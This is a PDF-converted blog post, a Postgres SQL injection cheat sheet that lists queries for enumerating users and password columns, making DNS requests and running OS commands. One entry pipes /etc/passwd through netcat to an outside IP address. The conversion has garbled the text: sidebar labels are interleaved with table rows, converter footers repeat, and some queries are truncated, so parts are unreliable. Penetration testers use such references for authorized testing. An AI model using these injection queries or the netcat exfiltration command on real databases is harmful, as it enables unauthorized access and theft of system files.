Postgres SQL Injection Cheat Sheet
Postgres SQL Injection Cheat Sheet
Blog (78) This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it
easier to read and to use the same table for for each database backend. This helps to highlight any features which are
Cheat Sheets (10)
lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to
Shells (1) researching yet.
SQL Injection (7)
The complete list of SQL Injection Cheat Sheets I’m working is:
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the
Uncategorized (3) query.
Yaptest (15)
Version SELECT version()
Front End (1)
Installing (2) Comments SELECT 1; –comment
Overview (2) SELECT /*comment*/1;
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SELECT usename FROM pg_user;
SELECT getpgusername();
Find Tables If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT
From Column DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
Name WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND
(A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE
‘public’) AND attname LIKE ‘%password%’;
Select Nth SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows
Row numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Bitwise AND SELECT 6 & 2; — returns 2
SELECT 6 & 1; –returns 0
If Statement IF statements only seem valid inside functions, so aren’t much use for SQL injection.
See CASE statement instead.
Case SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Statement
Make DNS Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default)
Requests it can be used to resolve hostnames (assuming you have DBA rights):
Alternatively, if you have DBA rights you could run an OS-level command (see below) to
resolve hostnames, e.g. “ping pentestmonkey.net”.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Execution ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1
8080′); — priv, commands run as postgres/pgsql OS-level user
Hostname, IP SELECT inet_server_addr(); — returns db server IP address (or null if using local
Address connection)
SELECT inet_server_port(); — returns db server IP address (or null if using local
connection)
Default/System template0
Databases template1
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Posted in SQL Injection
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD